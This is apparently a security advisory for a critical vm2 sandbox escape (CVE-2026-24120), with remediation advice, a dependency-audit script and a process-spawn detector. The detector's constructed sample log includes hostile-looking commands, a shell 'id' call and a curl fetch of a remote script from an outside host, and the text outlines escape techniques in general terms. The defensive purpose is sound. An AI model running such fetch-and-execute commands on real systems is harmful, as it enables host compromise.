vm2 sandbox escape RCE (CVE-2026-24120)
Patch now: CVE-2026-24120 is a critical (CVSS 9.8) sandbox escape in vm2 prior to version 3.10.5. Any attacker who can get JavaScript executed inside the sandbox gains remote code execution on the host with the privileges of the Node.js process. The fix for CVE-2023-37466 was incomplete and can be bypassed. Patched in version 3.10.5; update immediately.
Overview
CVE-2026-24120 is a critical vulnerability in the vm2 sandbox library for Node.js, rated CVSS 9.8 (Critical): network attack vector, low attack complexity, no privileges and no user interaction required. The only precondition is the ability to run JavaScript inside the vm2 sandbox, which in vm2's intended use (executing untrusted code) an attacker has by design. From there the attacker can bypass the sandbox boundary and execute arbitrary commands on the underlying host operating system with the privileges of the Node.js process.
The vulnerability arises because the patch for CVE-2023-37466 did not fully close all escape vectors. Attackers can craft specific JavaScript patterns that exploit incomplete sanitization in the sandbox’s proxy handlers, allowing them to access native Node.js APIs such as process.binding() or require functions that were supposed to be blocked.
Impact
Successful exploitation gives an attacker full control over the host system. They can:
- Execute arbitrary operating system commands
- Read, write, and delete files on the host filesystem
- Install malware, backdoors, or cryptocurrency miners
- Move laterally within the network using the compromised host as a foothold
Because vm2 is commonly used in coding platforms, evaluation services, and serverless environments where user-submitted code must run safely, any service that uses vm2 prior to 3.10.5 and allows untrusted code execution is at immediate risk.
Remediation
Immediate action: upgrade vm2 to version 3.10.5 or later; this is the only complete fix. The related advisories below note further escapes fixed in 3.11.0, so upgrade to the latest release rather than to 3.10.5 exactly, and audit the whole dependency tree, since vm2 is frequently pulled in transitively by other packages.
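As an added example (not code from the vm2 project or from this advisory), the following Node.js script audits a dependency tree for every vm2 instance, including transitively installed copies, and compares each against the fixed version. It assumes the tree is the JSON produced by `npm ls vm2 --all --json` in the project root; SAMPLE_TREE below is constructed for illustration, and the comparator is a minimal release/prerelease semver comparison rather than a full implementation.

```javascript
// Added example: audit an npm dependency tree for vulnerable vm2 versions.
// Input is assumed to be the JSON from `npm ls vm2 --all --json`.
// SAMPLE_TREE is constructed for illustration, not output from a real project.

const FIXED_VERSION = '3.10.5';

// Split "MAJOR.MINOR.PATCH[-prerelease][+build]" into numeric core parts and
// an optional prerelease tag. Build metadata is ignored, as semver requires.
function parseVersion(v) {
  const noBuild = v.split('+')[0];
  const dash = noBuild.indexOf('-');
  const core = dash === -1 ? noBuild : noBuild.slice(0, dash);
  const pre = dash === -1 ? null : noBuild.slice(dash + 1);
  const parts = core.split('.').map(Number);
  if (parts.length !== 3 || parts.some(Number.isNaN)) {
    throw new Error(`unparseable version: ${v}`);
  }
  return { parts, pre };
}

// Returns -1, 0 or 1. A prerelease sorts below the release with the same core
// (3.10.5-rc.1 < 3.10.5); prerelease tags are compared lexically, which is a
// simplification of full semver precedence but enough for an audit.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.parts[i] !== pb.parts[i]) return pa.parts[i] < pb.parts[i] ? -1 : 1;
  }
  if (pa.pre === pb.pre) return 0;
  if (pa.pre === null) return 1;
  if (pb.pre === null) return -1;
  return pa.pre < pb.pre ? -1 : 1;
}

function isVulnerable(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Depth-first walk over the npm ls tree. Every node named vm2 is recorded with
// the path of packages that pulled it in, so transitive copies are not missed.
function findVm2(node, path, out) {
  const deps = node.dependencies || {};
  for (const [name, child] of Object.entries(deps)) {
    const childPath = [...path, name];
    if (name === 'vm2' && child.version) {
      out.push({
        path: childPath.join(' > '),
        version: child.version,
        vulnerable: isVulnerable(child.version),
      });
    }
    findVm2(child, childPath, out);
  }
  return out;
}

function auditTree(tree) {
  return findVm2(tree, [tree.name || '(root)'], []);
}

// Constructed sample: one direct vm2, one nested vulnerable copy, one fixed copy.
const SAMPLE_TREE = {
  name: 'code-runner-service',
  dependencies: {
    vm2: { version: '3.10.4' },
    'legacy-eval-plugin': {
      version: '1.2.0',
      dependencies: { vm2: { version: '3.9.19' } },
    },
    'sandbox-wrapper': {
      version: '2.0.0',
      dependencies: { vm2: { version: '3.10.5' } },
    },
  },
};

// Replace SAMPLE_TREE with JSON.parse(<npm ls output>) to audit a real project.
for (const finding of auditTree(SAMPLE_TREE)) {
  const status = finding.vulnerable ? 'VULNERABLE' : 'ok';
  console.log(`${status.padEnd(10)} vm2@${finding.version}  via ${finding.path}`);
}
```

In a CI job, fail the build when any finding is vulnerable; a lockfile-based check is equivalent but the `npm ls` tree is what reflects the installed state of the deployment being assessed.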
Mitigations (if immediate upgrade is not possible):
- Disable any services that accept user-submitted JavaScript code until patching is complete
- If vm2 is used only internally, restrict network access to the affected services
- Monitor for unusual process spawning (especially Node.js child processes) or unexpected file system writes
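The process-spawning mitigation above, as an added detection example (not from the original advisory or the vm2 project): it parses constructed exec-telemetry lines in a key=value format, rebuilds each process's parent chain, and flags any process exec'd beneath the Node.js service that is not on an allowlist. SANDBOX_HOST_COMM and ALLOWED_FROM_NODE are assumptions to tune per deployment; a real source (auditd SYSCALL/EXECVE records, an eBPF sensor, an EDR) needs its own line parser, but the ancestry logic is the same.

```javascript
// Added example: flag processes exec'd beneath the Node.js service that hosts vm2.
// SAMPLE_LINES is a constructed key=value exec log standing in for real process
// telemetry; it is not output from any real sensor.

const SANDBOX_HOST_COMM = 'node';            // assumption: comm of the vm2 host process
const ALLOWED_FROM_NODE = new Set(['node']); // assumption: execs the service does itself

const SAMPLE_LINES = [
  'ts=1700000000.001 pid=4120 ppid=1 comm=node exe=/usr/bin/node args="node server.js"',
  'ts=1700000001.010 pid=4130 ppid=4120 comm=node exe=/usr/bin/node args="node worker.js"',
  'ts=1700000002.020 pid=4150 ppid=4130 comm=sh exe=/bin/sh args="sh -c id"',
  'ts=1700000002.030 pid=4151 ppid=4150 comm=id exe=/usr/bin/id args="id"',
  'ts=1700000003.000 pid=4200 ppid=1 comm=cron exe=/usr/sbin/cron args="cron"',
  'ts=1700000003.100 pid=4201 ppid=4200 comm=sh exe=/bin/sh args="sh -c /opt/backup.sh"',
  'ts=1700000004.000 pid=4160 ppid=4120 comm=curl exe=/usr/bin/curl args="curl http://198.51.100.7/x.sh"',
];

// Parse one line into an object; quoted values may contain spaces.
function parseEvent(line) {
  const ev = {};
  const re = /(\w+)=(?:"([^"]*)"|(\S+))/g;
  let m;
  while ((m = re.exec(line)) !== null) ev[m[1]] = m[2] !== undefined ? m[2] : m[3];
  if (!ev.pid || !ev.ppid || !ev.comm) return null;
  ev.pid = Number(ev.pid);
  ev.ppid = Number(ev.ppid);
  return ev;
}

// Follow ppid links through processes already seen. Stops at pid 1, at an
// unknown parent, or on a cycle (pid reuse can produce one in real data).
function ancestry(ev, table) {
  const chain = [ev.comm];
  const seen = new Set([ev.pid]);
  let cur = ev;
  while (cur.ppid > 1 && !seen.has(cur.ppid)) {
    const parent = table.get(cur.ppid);
    if (!parent) break;
    seen.add(parent.pid);
    chain.push(parent.comm);
    cur = parent;
  }
  return chain;
}

// Returns one alert per exec whose ancestors include the sandbox host process
// and whose own image is not on the allowlist. Real telemetry should key the
// table on pid plus start time, since pids are reused; this example keys on pid
// and lets a later exec of the same pid overwrite the earlier image.
function detectSuspiciousExecs(lines) {
  const table = new Map();
  const alerts = [];
  for (const line of lines) {
    const ev = parseEvent(line);
    if (!ev) continue;
    table.set(ev.pid, ev);
    const chain = ancestry(ev, table);
    const underNode = chain.slice(1).includes(SANDBOX_HOST_COMM);
    if (underNode && !ALLOWED_FROM_NODE.has(ev.comm)) {
      alerts.push({ pid: ev.pid, comm: ev.comm, args: ev.args, chain: chain.join(' <- ') });
    }
  }
  return alerts;
}

for (const a of detectSuspiciousExecs(SAMPLE_LINES)) {
  console.log(`ALERT pid=${a.pid} ${a.chain}  args="${a.args}"`);
}
```

In the constructed sample the shell, the `id` it runs and the `curl` fetch are all reported, while the cron-launched shell is not. Pair this with file-integrity monitoring on the host, since the mitigation list also calls for watching unexpected filesystem writes.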
For organizations that cannot patch immediately, move untrusted code out of the vm2 process entirely: run it in an isolated container or microVM, or in a separate OS process under a dedicated low-privilege user with a stripped environment, execution timeouts and no network access. Note that Node's built-in vm module and worker_threads are not security boundaries (the Node.js documentation states that vm is not a security mechanism and must not be used to run untrusted code), so they are not a substitute for vm2; the isolation has to come from the operating system or the hypervisor.
Security Insight
CVE-2026-24120 is the latest in a series of vm2 sandbox escapes (CVE-2023-37466 among them, and the related advisories below list further escapes fixed in 3.11.0). Each patch closes specific escape vectors and new ones keep being found, which points to an architectural limitation of isolating untrusted JavaScript with proxies inside the same V8 isolate and the same process, rather than to isolated bugs. Organizations that must run untrusted code should evaluate whether process-, container- or hypervisor-level isolation, or a language-level boundary such as WebAssembly, offers more robust guarantees.
Related Advisories
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and ...
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can esc...
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0....
vm2 is an open source vm/sandbox for Node.js. In version 3.10.4, vm2 is vulnerable to full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and r...